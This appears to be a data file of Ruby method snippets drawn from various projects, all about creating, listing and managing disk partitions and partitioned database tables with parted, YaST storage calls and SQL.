"def create_partitions\n info(\"Creating disk with #{PARTITION_TABLE_TYPE} parition table\")\n execute!(\"parted -s #{@dev} mklabel #{PARTITION_TABLE_TYPE}\")\n\n start_size = FIRST_PARTITION_OFFSET\n end_size = FIRST_PARTITION_OFFSET\n\n unspec_part = nil\n\n # Create the partitions\n @partition_layout.each_with_index do |part, index|\n # Deal with any \"open ended\" partitions last\n if not part.size_mb.is_a?(Integer)\n unspec_part = part\n next\n end\n\n start_size = end_size\n end_size += part.size_mb\n\n info(\"Creating partition #{part.label} (#{part.fs}, #{part.size_mb}MiB)\")\n execute!(\"parted #{@dev} mkpart #{part.label} #{part.fs} #{start_size}MiB #{end_size}MiB\")\n\n (part.flags || {}).each_pair { |k, v|\n info(\"Setting partition flag #{k} to #{v}\")\n execute!(\"parted #{@dev} set #{index + 1} #{k} #{v}\")\n }\n\n label_path = \"/dev/disk/by-partlabel/#{part.label}\"\n self.wait_for_device(label_path)\n\n if not part.fs\n warn(\"No filesystem specified for #{part.label}. Skipping FS\")\n else\n create_filesystem(part.fs, label_path, part.label)\n end\n\n if part.lvm\n notice(\"Setting up LVM on #{part.label}\")\n setup_lvm_on_partition(part)\n end\n end\n\n # Deal with any \"open ended\" partitions (that have an unspecified size_mb)\n if unspec_part\n part = unspec_part\n info(\"Creating partition #{part.label} (#{part.fs}, 100% remaining)\")\n execute!(\"parted #{@dev} mkpart #{part.label} #{part.fs} #{end_size}MiB 100%\")\n\n (part.flags || {}).each_pair { |k, v|\n info(\"Setting partition flag #{k} to #{v}\")\n execute!(\"parted #{@dev} set #{@partition_layout.length} #{k} #{v}\")\n }\n\n label_path = \"/dev/disk/by-partlabel/#{part.label}\"\n self.wait_for_device(label_path)\n create_filesystem(part.fs, label_path, part.label) if part.fs\n\n if part.lvm\n notice(\"Setting up LVM on #{part.label}\")\n setup_lvm_on_partition(part)\n end\n end\n\n nil\n end",
"def CreatePartition(disk, device, ptype, id, start, len, mby)\n Builtins.y2milestone(\n \"CreatePartition disk:%1 device:%2 ptype:%3 id:%4 start:%5 len:%6 mby:%7\",\n disk,\n device,\n ptype,\n id,\n start,\n len,\n mby\n )\n pt = fromSymbol(@conv_ptype, ptype)\n Builtins.y2milestone(\"CreatePartition type:%1 pt:%2\", ptype, pt)\n ret, cdev = @sint.createPartition(disk, pt, start, len)\n cdev = \"\" if ret<0\n if device != cdev\n Builtins.y2error(\"CreatePartition device:%1 cdev:%2\", device, cdev)\n end\n Builtins.y2error(\"CreatePartition ret %1\", ret) if ret<0\n ret = @sint.changePartitionId(device, id)\n Builtins.y2error(\"CreatePartition ret %1\", ret) if ret<0\n tmp = fromSymbol(@conv_mountby, mby)\n @sint.changeMountBy(device, tmp)\n Builtins.y2milestone(\"CreatePartition sint ret:%1\", ret)\n UpdateTargetMap()\n ret == 0\n end",
"def create_partition device, partition_type = 'primary', start_unit, end_unit\n command = 'parted'\n params = \"#{device.path} -s -a optimal unit MB mkpart #{partition_type} ext3 #{start_unit} -- #{end_unit}\"\n parted = CommandsExecutor.new command, params\n parted.execute\n raise \"Command execution error: #{parted.stderr.read}\" if not parted.success?\n probe_kernal device\n end",
"def addPartition(ptStr)\n pts_array = ptStr.split(',')\n sqlstr = \"ALTER TABLE \" + @mProjectName + \".\" + @mTableName\n sqlstr = sqlstr + \" ADD IF NOT EXISTS\" + \" PARTITION (\"\n pts_array.each { |pt|\n ptkv = pt.split('=')\n if ptkv.size != 2\n raise \"invalid partition spec\" + pt\n end\n sqlstr += ptkv[0] + '=' + \"'\" + ptkv[1] + \"'\" + ','\n }\n sqlstr = sqlstr[0..-2] + \");\"\n taskName = \"SQLAddPartitionTask\"\n runSQL(taskName, sqlstr)\n end",
"def create_partition_to_fill_disk(disk)\n # @disk.create_partition('primary', '100%')\n disk.create_partition_table # LinuxAdmin::Disk.create_partition has this already...\n AwesomeSpawn.run!(\"parted -s #{disk.path} mkpart primary 0% 100%\")\n\n # FIXME: Refetch the disk after creating the partition\n disk = LinuxAdmin::Disk.local.find { |d| d.path == disk.path }\n disk.partitions.first\n end",
"def create_table?(name, options=OPTS, &block)\n if options[:partition_of]\n create_table(name, options.merge!(:if_not_exists=>true), &block)\n return\n end\n\n super\n end",
"def create_partition(size = nil, type = Partition.PartitionType[:TYPE_PRIMARY])\n DiskUtils.create_partition self, size[:start_block], size[:end_block]\n partitions = Device.find(self).partitions\n return partitions.last\n end",
"def add_partition_key(name, type)\n PartitionKey.new(name, type(type)).tap do |column|\n @partition_key_columns << add_column(column)\n end\n end",
"def create\n begin\n # Set the partition (/dev/sdb1), device (/dev/sdb) and alignment (optimal,minimal,none etc.) variables\n partition= resource[:name]\n device=partition[0,(partition.length-1)]\n alignment= resource[:alignment]\n\n # Now we can create the partition\n partitions = parted('-a', resource[:alignment],'--script',device,'mklabel',resource[:part_label],'mkpart', resource[:part_type],resource[:fs_type],resource[:p_begin],resource[:p_end])\n rescue Puppet::ExecutionFailure => e\n false\n end\n end",
"def addPartition(ptStr)\n @mOdpsTable.addPartition(ptStr)\n end",
"def create(key_hash)\n # TODO: Raise if a key missing\n @model.transaction do\n partition = partition_class.create!(key_hash)\n @keys.create_partition_tables(@model, :key_hash => key_hash)\n # TODO: Indexes\n partition\n end\n end",
"def partition_type\n raise Error, \"Unable to determine partition type, multiple different partitioning methods called\" if [@from || @to, @list, @modulus || @remainder, @default].compact.length > 1\n\n if @from || @to\n raise Error, \"must call both from and to when creating a partition of a table if calling either\" unless @from && @to\n :range\n elsif @in\n :list\n elsif @modulus || @remainder\n raise Error, \"must call both modulus and remainder when creating a partition of a table if calling either\" unless @modulus && @remainder\n :hash\n elsif @default\n :default\n else\n raise Error, \"unable to determine partition type, no partitioning methods called\"\n end\n end",
"def create_range_partition_of(parent_table_name, options)\n if (options[:range_start].nil? || options[:range_end].nil?) && options[:default].blank?\n raise ArgumentError, 'range_start and range_end or default must be defined'\n end\n\n Tablature.database.create_range_partition_of(parent_table_name, options)\n end",
"def create_list_partition_of(parent_table_name, options)\n if options[:values].blank? && options[:default].blank?\n raise ArgumentError, 'values or default must be defined'\n end\n\n Tablature.database.create_list_partition_of(parent_table_name, options)\n end",
"def create_side_table\n RailsRedshiftReplicator.connection.exec \"CREATE TABLE #{temporary_table_name} (LIKE #{replication.target_table})\"\n end",
"def add_partition_to_node( tp, node )\n\n @nodes_lists_replicas[node][tp] = ''\n @partitions_lists[tp]['replicas'] ||= {}\n @partitions_lists[tp]['replicas'][node] = ''\n end",
"def partition(partition_key)\n state_depth_must_be(States::RELATION)\n if @current_relation.partitions.include?(partition_key)\n raise \"duplicate partition key #{partition_key}\"\n end\n @current_relation.partitions << partition_key\n end",
"def create_with_partition(partition)\n NicView.new(fqdd.gsub(/[-]\\d+$/, \"-#{partition}\"))\n end",
"def set_partition\n @partition = Partition.find(params[:id])\n end",
"def partition\n PredicatePartition.new(predicate, operand.left.header, operand.right.header)\n end",
"def partitioned_tables\n PartitionedTables.new(connection).all\n end",
"def partition!(id)\n partition(id) || ErrorCode[:unknown_topic_or_partition].raise\n end",
"def add!(partition, dirty = false)\n if @list[partition.name].nil?\n @list[partition.name] = partition\n else\n @list[partition.name].merge!(partition, simulate = false, dirty)\n end\n self\n end",
"def attach_to_range_partition(parent_table_name, options)\n raise ArgumentError, 'name must be defined' if options[:name].blank?\n if (options[:range_start].nil? || options[:range_end].nil?) && options[:default].blank?\n raise ArgumentError, 'range_start and range_end or default must be defined'\n end\n\n Tablature.database.attach_to_range_partition(parent_table_name, options)\n end",
"def partition_device\n Souffle::Log.info \"#{@node.log_prefix} Partitioning the device...\"\n provider.partition(@node)\n end",
"def partition_for!(key)\n if leader_available?\n # Use the configured partitioner\n partition_id = partitioner.call(key, available_partitions.count, partitions.count)\n partition!(partition_id)\n else\n error_code.raise\n end\n end",
"def create_blob_table(name, shard_count = 5, replicas = 0)\n stmt = %{CREATE BLOB TABLE \"#{name}\" CLUSTERED INTO ? SHARDS WITH (number_of_replicas=?)}\n execute stmt, [shard_count, replicas]\n end",
"def create_table_with_inherits(table_name, options = {}, &block)\n options[:primary_key] = \"#{options[:inherits]}_id\" if options[:inherits]\n\n create_table_without_inherits(table_name, options) do |table_defintion|\n yield table_defintion \n end \n end",
"def partition_list()\nend",
"def create_table!(*args, &block)\n drop_table?\n create_table(*args, &block)\n end",
"def partition\n return enum_for(:partition) if not block_given?\n a,b = super\n [self.class.new(a), self.class.new(b)].freeze\n end",
"def tnTableCreation(tableName)\n pk_list = @pkList.join(',')\n pk_list = \"#{pk_list},branch_name,node_name\"\n q = QueryBuilder.create_tbl(tableName, pk_list, \"select #{@pkSelect}, 0 as test_id,''::varchar(30) as node_name, ''::varchar(30) as branch_name, ''::varchar(5) as type from #{@fTable} f where 1 = 0\")\n # pp q\n DBConn.exec(q)\n\n # q=\"ALTER TABLE #{tableName} add column test_id int, add column node_name varchar(30), add column branch_name varchar(30), add column type varchar(5);\"\n # DBConn.exec(q)\n # pk=@pkList.join(',')\n # # add index\n # q=\"create index ix_#{tableName}t on #{tableName} (#{pk},branch_name);\"\n # pp q\n # DBConn.exec(q)\n end",
"def attach_to_list_partition(parent_table_name, options)\n raise ArgumentError, 'name must be defined' if options[:name].blank?\n\n Tablature.database.attach_to_list_partition(parent_table_name, options)\n end",
"def create_table!(name, &block)\n drop_table(name) rescue nil\n create_table(name, &block)\n end",
"def create_slice(col_name, col_value)\n ds = @data_source.create_sliced_table(col_name, col_value)\n dsp = self.class.new(ds.name, ds)\n def dsp.release; @data_source.release end\n dsp\n end",
"def create_tables\n x = 1\n table_count = (all_guests.length / table_size_limit.to_f).ceil\n while x <= table_count\n Table.create(table_number: x, table_size_limit: table_size_limit, event_id: id)\n x += 1\n end\n end",
"def add_concurrent_partitioned_foreign_key(source, target, column:, on_delete: :cascade, name: nil)\n assert_not_in_transaction_block(scope: ERROR_SCOPE)\n\n partition_options = {\n column: column,\n on_delete: on_delete,\n\n # We'll use the same FK name for all partitions and match it to\n # the name used for the partitioned table to follow the convention\n # used by PostgreSQL when adding FKs to new partitions\n name: name.presence || concurrent_partitioned_foreign_key_name(source, column),\n\n # Force the FK validation to true for partitions (and the partitioned table)\n validate: true\n }\n\n if foreign_key_exists?(source, target, **partition_options)\n warning_message = \"Foreign key not created because it exists already \" \\\n \"(this may be due to an aborted migration or similar): \" \\\n \"source: #{source}, target: #{target}, column: #{partition_options[:column]}, \"\\\n \"name: #{partition_options[:name]}, on_delete: #{partition_options[:on_delete]}\"\n\n Gitlab::AppLogger.warn warning_message\n\n return\n end\n\n partitioned_table = find_partitioned_table(source)\n\n partitioned_table.postgres_partitions.order(:name).each do |partition|\n add_concurrent_foreign_key(partition.identifier, target, **partition_options)\n end\n\n with_lock_retries do\n add_foreign_key(source, target, **partition_options)\n end\n end",
"def partitions_to_append_by_ts_range(partition_start_timestamp, end_timestamp, partition_size_unit, partition_size)\n if partition_size_unit.nil? || !VALID_PARTITION_SIZE_UNITS.include?(partition_size_unit)\n _raise_arg_err \"partition_size_unit must be one of: #{VALID_PARTITION_SIZE_UNITS.inspect}\"\n end\n\n _validate_positive_fixnum(:partition_size, partition_size)\n _validate_positive_fixnum(:partition_start_timestamp, partition_start_timestamp)\n _validate_positive_fixnum(:end_timestamp, end_timestamp)\n\n timestamp = partition_start_timestamp\n\n partitions_to_append = {}\n while timestamp < end_timestamp\n timestamp = @tuc.advance(timestamp, partition_size_unit, partition_size)\n\n partition_name = name_from_timestamp(timestamp)\n partitions_to_append[partition_name] = timestamp\n end\n\n partitions_to_append\n end",
"def partitions_to_append(partition_start_timestamp, partition_size_unit, partition_size, days_into_future)\n _validate_positive_fixnum(:days_into_future, days_into_future)\n\n end_timestamp = @tuc.advance(current_timestamp, :days, days_into_future)\n partitions_to_append_by_ts_range(partition_start_timestamp, end_timestamp, partition_size_unit, partition_size)\n end",
"def create_table(*params)\n connection.create_table(*params) {}\n end",
"def list_partitions(table_name, params = {})\n all_params = approved_tables.smash(table_name, params)\n validation.validate_parameters(all_params)\n partitions(all_params)\n end",
"def setPartitionType(settings)\n settings = deep_copy(settings)\n tm = Storage.GetTargetMap\n settings = Builtins.maplist(settings) do |d|\n if Ops.get_symbol(d, \"type\", :x) == :CT_DISK\n mp = Ops.get_integer(\n tm,\n [Ops.get_string(d, \"device\", \"xxx\"), \"max_primary\"],\n 0\n )\n if Ops.greater_than(mp, 0)\n Ops.set(\n d,\n \"partitions\",\n Builtins.maplist(Ops.get_list(d, \"partitions\", [])) do |pe|\n if Builtins.haskey(pe, \"partition_nr\") &&\n !Builtins.haskey(pe, \"partition_type\") &&\n Ops.less_or_equal(\n Ops.get_integer(pe, \"partition_nr\", -1),\n mp\n )\n Ops.set(pe, \"partition_type\", \"primary\")\n end\n deep_copy(pe)\n end\n )\n end\n end\n deep_copy(d)\n end\n Builtins.y2milestone(\"after setPartitionType = %1\", settings)\n deep_copy(settings)\n end",
"def create_table\n raise \"Need to implement abstract method.\" \n end",
"def onepartition2fstab(part, other_nr)\n part = deep_copy(part)\n Builtins.y2milestone(\"onepartition2fstab part=%1\", part)\n if Ops.get_boolean(part, \"delete\", false) ||\n Ops.get_symbol(part, \"type\", :unknown) == :extended ||\n Builtins.contains(\n [:lvm, :sw_raid, :evms],\n Ops.get_symbol(part, \"type\", :unknown)\n ) &&\n Builtins.size(Ops.get_string(part, \"mount\", \"\")) == 0 ||\n Ops.get_symbol(part, \"enc_type\", :none) != :none &&\n !Ops.get_boolean(part, \"noauto\", false) ||\n !IsUsedBy(part) ||\n Builtins.contains(\n [\n Partitions.fsid_prep_chrp_boot,\n Partitions.fsid_lvm,\n Partitions.fsid_raid\n ],\n Ops.get_integer(part, \"fsid\", 0)\n ) &&\n Builtins.size(Ops.get_string(part, \"mount\", \"\")) == 0\n return {}\n end\n\n spec = Ops.get_string(part, \"device\", \"\")\n if Ops.get_symbol(part, \"mountby\", :device) == :label &&\n Ops.greater_than(Builtins.size(Ops.get_string(part, \"label\", \"\")), 0)\n spec = Builtins.sformat(\"LABEL=%1\", Ops.get_string(part, \"label\", \"\"))\n elsif Ops.get_symbol(part, \"mountby\", :device) == :uuid &&\n Ops.greater_than(Builtins.size(Ops.get_string(part, \"uuid\", \"\")), 0)\n spec = Builtins.sformat(\"UUID=%1\", Ops.get_string(part, \"uuid\", \"\"))\n end\n Builtins.y2debug(\"onepartition2fstab spec=%1\", spec)\n mount_point = Ops.get_string(part, \"mount\", \"\")\n fsid = Ops.get_integer(part, \"fsid\", 0)\n\n used_fs = Ops.get_symbol(part, \"used_fs\", :ext2)\n format = Ops.get_boolean(part, \"format\", false)\n\n vfstype = \"unknown\" # keep \"unknown\", used again below\n freq = 0\n passno = 0\n mntops = Ops.get_string(part, \"fstopt\", \"\")\n\n if mount_point == \"swap\"\n vfstype = \"swap\"\n if Builtins.isempty(mntops)\n mntops = Ops.get_string(\n FileSystems.GetFstabDefaultMap(\"swap\"),\n \"mntops\",\n \"\"\n )\n end\n passno = 0\n elsif fsid == Partitions.fsid_native || fsid == Partitions.fsid_lvm ||\n Ops.get_symbol(part, \"type\", :unknown) == :evms &&\n Ops.get_symbol(part, \"detected_fs\", :none) != :unknown\n vfstype = FileSystems.GetMountString(used_fs, format ? \"ext2\" : \"auto\")\n\n freq = 1\n if mount_point == \"/\"\n passno = 1\n elsif mount_point != \"\"\n passno = 2\n elsif Stage.initial && !Arch.s390\n mount_point = Ops.add(\"/data\", other_nr.value)\n # Don't mount and fsck this filesystem during boot, its\n # state is unknown.\n mntops = \"noauto,user\"\n vfstype = \"auto\"\n freq = 0\n passno = 0\n other_nr.value = Ops.add(other_nr.value, 1)\n Builtins.y2milestone(\"TT add MountPoint %1\", mount_point)\n end\n elsif (Arch.i386 || Arch.ia64 || Arch.x86_64) &&\n Ops.greater_than(Builtins.size(mount_point), 0) &&\n (used_fs == :vfat || used_fs == :ntfs) &&\n (Builtins.contains(\n Builtins.union(\n Builtins.union(\n Partitions.fsid_dostypes,\n Partitions.fsid_ntfstypes\n ),\n Partitions.fsid_wintypes\n ),\n fsid\n ) ||\n fsid == Partitions.fsid_gpt_boot)\n freq = 0\n passno = 0\n lower_point = Builtins.tolower(mount_point)\n if lower_point != \"\" && mount_point != lower_point\n lower_point = PathToDestdir(lower_point)\n Builtins.y2milestone(\n \"symlink %1 -> %2\",\n Builtins.substring(\n mount_point,\n Ops.add(Builtins.findlastof(mount_point, \"/\"), 1)\n ),\n lower_point\n )\n SCR.Execute(\n path(\".target.symlink\"),\n Builtins.substring(\n mount_point,\n Ops.add(Builtins.findlastof(mount_point, \"/\"), 1)\n ),\n lower_point\n )\n end\n vfstype = FileSystems.GetMountString(used_fs, \"auto\")\n elsif (Arch.sparc || Arch.alpha) &&\n Builtins.contains(Partitions.fsid_skipped, fsid)\n return {} # skip \"whole disk\" partition\n else\n return {} # unknown type\n end\n if Ops.get_symbol(part, \"detected_fs\", :unknown) == :unknown ||\n Ops.get_boolean(part, \"noauto\", false)\n passno = 0\n end\n\n ret = {\n \"spec\" => spec,\n \"mount\" => mount_point,\n \"vfstype\" => vfstype,\n \"mntops\" => mntops,\n \"freq\" => freq,\n \"device\" => Ops.get_string(part, \"device\", \"\"),\n \"passno\" => passno\n }\n\n if Builtins.size(Ops.get_string(ret, \"mntops\", \"\")) == 0\n Ops.set(ret, \"mntops\", \"defaults\")\n end\n\n Builtins.y2milestone(\"onepartition2fstab ret=%1\", ret)\n deep_copy(ret)\n end",
"def SetFormatPartitions(fstabpart)\n fstabpart = deep_copy(fstabpart)\n # All storage devices\n target_map = Storage.GetTargetMap\n\n # all activated\n tmp = Builtins.filter(RootPart.GetActivated) do |e|\n Ops.get_string(e, :type, \"\") == \"mount\" ||\n Ops.get_string(e, :type, \"\") == \"swap\"\n end\n\n Builtins.foreach(tmp) do |e|\n mntpt = Ops.get_string(e, :type, \"\") == \"swap\" ?\n \"swap\" :\n Ops.get_string(e, :mntpt, \"\")\n part = Ops.get_string(e, :device, \"\")\n p = {}\n Builtins.foreach(fstabpart) do |pp|\n # mountpoint matches\n if Ops.get_string(pp, \"mount\", \"\") == mntpt\n p = deep_copy(pp)\n raise Break\n end\n end\n mount_options = \"\"\n Builtins.foreach(Storage.ReadFstab(Installation.destdir)) do |entry|\n if Ops.get_string(entry, \"file\", \"\") == mntpt\n mount_options = Ops.get_string(entry, \"mntops\", \"\")\n raise Break\n end\n end\n target_map = Storage.SetPartitionData(target_map, part, \"mount\", mntpt)\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"format\",\n Ops.get_boolean(p, \"format\", false)\n )\n target_map = Storage.SetPartitionData(target_map, part, \"delete\", false)\n target_map = Storage.SetPartitionData(target_map, part, \"create\", false)\n if Builtins.haskey(p, \"filesystem\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"filesystem\",\n Ops.get_symbol(p, \"filesystem\", :ext4)\n )\n end\n if Ops.greater_than(Builtins.size(mount_options), 0) &&\n !Builtins.haskey(p, \"fstopt\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"fstopt\",\n mount_options\n )\n end\n if Builtins.haskey(p, \"fstopt\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"fstopt\",\n Ops.get_string(p, \"fstopt\", \"\")\n )\n end\n if Builtins.haskey(p, \"mountby\")\n target_map = Storage.SetPartitionData(\n target_map,\n part,\n \"mountby\",\n Ops.get_symbol(p, \"mountby\", :device)\n )\n end\n end\n\n Storage.SetTargetMap(target_map)\n true\n end",
"def create_part_of_path(path)\n begin\n @zk.create(path, \"\".to_java_bytes, default_acl, default_mode)\n rescue\n puts \"#{$!}\"\n end\n end",
"def partitions( partition_count, &proc )\n Enumerable.partition_sizes( self.size, partition_count ) do |partition|\n partitioned_collection = []\n consumed_so_far = 0\n partition.each do |partition_size|\n partitioned_collection << self[ consumed_so_far, partition_size ]\n consumed_so_far += partition_size\n end\n yield partitioned_collection\n end\n end",
"def create_backup instance_id:, cluster_id:, backup_id:, source_table_id:, expire_time:\n backup = Google::Cloud::Bigtable::Admin::V2::Backup.new \\\n source_table: table_path(instance_id, source_table_id), expire_time: expire_time\n tables.create_backup parent: cluster_path(instance_id, cluster_id), backup_id: backup_id, backup: backup\n end",
"def create_prejoined_fact_table(options={})\r\n connection.transaction {\r\n drop_prejoin_fact_table\r\n\r\n connection.create_table(prejoined_table_name, :id => false) do |t|\r\n # get all columns except the foreign_key columns for prejoined dimensions\r\n columns.each do |c|\r\n t.column(c.name, c.type) unless excluded_foreign_key_names.include?(c.name)\r\n end\r\n #prejoined_columns\r\n prejoined_fields.each_pair do |key, value|\r\n dclass = dimension_class(key)\r\n dclass.columns.each do |c|\r\n t.column(c.name, c.type) if value.include?(c.name.to_sym) \r\n end\r\n end\r\n end\r\n }\r\n end",
"def start\n super\n unless @account_name.nil? || @access_key.nil?\n @table_client = Azure::Storage::Table::TableService.create(storage_account_name: @account_name,storage_access_key:@access_key)\n end\n\n begin\n @table_client.create_table(@table) if @create_table_if_not_exists && !table_exists?(@table)\n rescue Exception => e\n log.error e\n exit!\n end\n end",
"def write(table,data,partition_key=nil)\n\n ## Get table schema...\n schema = get_table_schema(table)\n\n if schema == nil\n raise \"Scheme does not exist for table name ='#{table}'\"\n end\n\n ## Ensure that the keys in the passed data are symbols (this is what's expected)\n data.keys.each do |key|\n if(key.is_a?(Symbol) == false)\n raise \"Data key #{key} is not a symbol!\"\n # TODO: CONVERT string keys to symbols instead of raising\n end\n end\n\n intersection = schema[:columns].keys & data.keys\n\n ## Validate no data keys are passed that are not in table schema\n data.keys.each do |key|\n if(intersection.include?(key) == false)\n raise \"Data key #{key} is not in schema for #{table} table!!\"\n end\n end\n\n ## Validate that columns are not null\n schema[:columns].each do |column_name,column|\n if(column.keys.include?(:constraint) == true && column[:constraint] == \"not null\" && intersection.include?(column_name) == false)\n raise \"Column #{column_name} is missing from passed data\"\n end\n end\n\n ## Validate column types\n schema[:columns].each do |column_name,column|\n if(intersection.include?(column_name) == true)\n\n value = data[column_name.to_sym]\n column_type = column[:type]\n\n if column_type['('] != nil\n type_name = column_type[/(.*)\\(.*/,1]\n else\n type_name = column_type\n end\n\n type_name_downcased = type_name.downcase\n\n if @valid_data_types.include? type_name_downcased\n type_name_check_function = \"check_#{type_name_downcased.gsub(' ','_')}\".to_sym\n data[column_name.to_sym] = @data_types.send(type_name_check_function,value,column_type,column_name)\n else\n raise \"Invalid data type #{type_name}. Valid types [#{@valid_data_types.join(\",\")}]\"\n end\n end\n end\n\n ## Serialize as json, we load the data as JSON into redshift\n data_string=data.to_json\n\n ## Write the serialized data string to the broker\n partition_key = partition_key || rand(100).to_s\n stream_name = @broker.stream_name(table)\n result = @broker.stream_write(stream_name, data_string, partition_key)\n\n return result\n end",
"def create(structure_, data_={})\n Table.new(structure_, data_)\n end",
"def partition(arr, n)\n\nend",
"def insert_table dataset_id, new_table_gapi\n execute { service.insert_table @project, dataset_id, new_table_gapi }\n end",
"def ___create_tbl(tbl)\n return if internal('tables').split(' ').include?(tbl.tid)\n @que.push tbl.create\n verbose { \"'#{tbl.tid}' is created\" }\n end",
"def createTaskTable\n @Handle.execute( @TaskSchema ) \n end",
"def dynamic_partition(data, partitions, num_partitions, name: nil)\n result = _op(:dynamic_partition, data, partitions, num_partitions: num_partitions, name: nil)\n num_partitions.times.map do |index|\n result[index]\n end\n end",
"def full_format fstype, label = nil\n DebugLogger.info \"class = #{self.class.name}, method = #{__method__}\"\n delete_all_partitions unless partitions.blank?\n DebugLogger.info \"|#{self.class.name}|>|#{__method__}|:Creating partition #{self.kname}\"\n DiskUtils.create_partition self, 1, -1\n DebugLogger.info \"|#{self.class.name}|>|#{__method__}|:Find partition #{@kname}\"\n self.reload\n new_partition = self.partitions.last # Assuming new partition to be at the last index\n DebugLogger.info \"|#{self.class.name}|>|#{__method__}|:Formating #{@kname} to #{fstype}\"\n new_partition.format fstype and reload\n end",
"def partition(array, start_index, end_index)\n pivot = array[end_index]\n insert_index = start_index\n for i in start_index...end_index\n if array[i] <= pivot\n swap(array, i, insert_index)\n insert_index += 1\n end\n end\n swap(array, insert_index, end_index)\n return insert_index\nend",
"def copy_table(old_table_name, new_table_name)\n transaction do\n execute \"CREATE TABLE #{new_table_name} LIKE #{old_table_name}\"\n execute \"INSERT INTO #{new_table_name} SELECT * FROM #{old_table_name}\"\n end\n end",
"def partition_params\n params.require(:partition).permit(:name, :body, :chapter_id)\n end",
"def partitions\n [6, 3, 0].map { |n| model.id / 10**n % 1000 }\n end",
"def DeletePartitionTable(disk, label)\n Builtins.y2milestone(\"DeletePartitionTable disk:%1 label:%2\", disk, label)\n label = DefaultDiskLabel(disk) if Builtins.isempty(label)\n ret = @sint.destroyPartitionTable(disk, label)\n if ret<0\n Builtins.y2error(\"DeletePartitionTable sint ret:%1\", ret)\n end\n UpdateTargetMap()\n ret == 0\n end",
"def copy_table(old_table_name, new_table_name)\n transaction do\n execute \"CREATE TABLE #{new_table_name} LIKE #{old_table_name}\"\n execute \"INSERT INTO #{new_table_name} SELECT * FROM #{old_table_name}\"\n end\n end",
"def create_table(dataset, table, schema)\n api_debug('Creating table', dataset, table)\n table_id = com.google.cloud.bigquery.TableId.of dataset, table\n\n table_defn = com.google.cloud.bigquery.StandardTableDefinition.of schema\n table_info = com.google.cloud.bigquery.TableInfo.newBuilder(table_id, table_defn).build()\n\n @bigquery.create table_info\n end",
"def table_name(*partition_key_values)\n return collect_first(*partition_key_values, &:table_name)\n end",
"def ResizePartition(device, disk, new_cyls)\n Builtins.y2milestone(\n \"ResizePartition device:%1 disk:%2 new_cyls:%3\",\n device,\n disk,\n new_cyls\n )\n ret = @sint.resizePartition(device, new_cyls)\n if ret<0\n Builtins.y2error(\"ResizePartition sint ret:%1\", ret)\n end\n UpdateTargetMapDisk(disk)\n ret == 0\n end",
"def create_table(name, &block)\n g = Schema::Generator.new(self, &block)\n create_table_sql_list(name, *g.create_info).each {|sql| execute(sql)}\n end",
"def create(size)\n disk_id = uuid\n sh \"zfs create -o reservation=1024 -o quota=1024 #{base}/#{disk_id}\"\n disk_id\n end",
"def generate_partitioner(graph,partitioners,numReduceTask)\r\n \r\n puts\"--- PARTITIONER ---\" \r\n \r\n @Jobs.each do |current_job| \r\n \r\n if partitioners.size == 0\r\n return\r\n end\r\n \r\n numReduceTask_int = 1 # valore di default\r\n \r\n unless numReduceTask.size == 0\r\n numReduceTask.each do |inline|\r\n \r\n fields = inline.split('.')\r\n if current_job == fields[0] #se viene definito un setNumTask per qul job\r\n numReduceTask_int = fields[1].scan(/\\d+/)\r\n numReduceTask_int = numReduceTask_int.first.to_i\r\n else\r\n next\r\n end\r\n end \r\n \r\n if numReduceTask_int == 0 # viene imposto che non ci sará il reducer\r\n next # passo al prossimo ciclo di job\r\n end \r\n end \r\n\r\n fields = partitioners.first.split('.')\r\n \r\n # se il job da analizzare é uguale a quello corrente => lo lavoro\r\n if current_job == fields[0] \r\n partitioner_name = current_job + \".\" + \"PARTITIONER_\" + fields[1].split('(')[1]\r\n \r\n #aggiungo il nodo partitioner\r\n graph.add_node(partitioner_name,\"is_partitioner\")\r\n puts \"aggiunto partitioner:\" + partitioner_name\r\n \r\n # chiudo i nodi pendenti ( job per job) \r\n Close_ALL_pending_links(graph,current_job,partitioner_name)\r\n \r\n for i in(1..numReduceTask_int)\r\n @OpenLink.push(partitioner_name); \r\n end \r\n end \r\n end #do jobs\r\n \r\n end",
"def createStakeholderTable\n @Handle.execute( @StakeholderSchema ) \n end",
"def AddMountPointsForWinParts(partitions, primary, max_prim, foreign_nr)\n partitions = deep_copy(partitions)\n return if !Arch.i386 && !Arch.ia64 && !Arch.x86_64\n\n foreign_ids = \"CDEFGHIJKLMNOPQRSTUVW\"\n\n Builtins.foreach(partitions) do |partition|\n new_partition = deep_copy(partition)\n fsid = Ops.get_integer(partition, \"fsid\", Partitions.fsid_native)\n partnum = 0\n if Builtins.haskey(partition, \"nr\") &&\n Ops.is_integer?(Ops.get(partition, \"nr\", 0))\n partnum = Ops.get_integer(partition, \"nr\", 0)\n end\n if !Builtins.haskey(partition, \"mount\") &&\n !Ops.get_boolean(partition, \"delete\", false) &&\n Ops.less_or_equal(partnum, max_prim) == primary &&\n Ops.less_than(foreign_nr.value, 24) &&\n Partitions.IsDosWinNtPartition(fsid) &&\n !Arch.ia64 &&\n !IsEfiPartition(partition) &&\n Ops.greater_or_equal(\n Ops.get_integer(partition, \"size_k\", 0),\n 1024 * 1024\n ) &&\n Builtins.contains(\n [:vfat, :ntfs],\n Ops.get_symbol(partition, \"used_fs\", :none)\n )\n Ops.set(\n new_partition,\n \"fstopt\",\n FileSystems.DefaultFstabOptions(partition)\n )\n if Builtins.contains(Partitions.fsid_dostypes, fsid)\n Ops.set(\n new_partition,\n \"mount\",\n Ops.add(\n \"/dos/\",\n Builtins.substring(foreign_ids, foreign_nr.value, 1)\n )\n )\n foreign_nr.value = Ops.add(foreign_nr.value, 1)\n else\n Ops.set(\n new_partition,\n \"mount\",\n Ops.add(\n \"/windows/\",\n Builtins.substring(foreign_ids, foreign_nr.value, 1)\n )\n )\n foreign_nr.value = Ops.add(foreign_nr.value, 1)\n end\n ChangeVolumeProperties(new_partition)\n Builtins.y2milestone(\"win part %1\", new_partition)\n end\n end\n\n nil\n end",
"def dump_partition_indexes(partitioned_table, stream)\n return unless Tablature.database.respond_to?(:indexes_on)\n\n indexes = Tablature.database.indexes_on(partitioned_table.name)\n return if indexes.empty?\n\n add_index_statements = indexes.map do |index|\n table_name = remove_prefix_and_suffix(index.table).inspect\n \" add_index #{([table_name] + index_parts(index)).join(', ')}\"\n end\n\n stream.puts add_index_statements.sort.join(\"\\n\")\n stream.puts\n end",
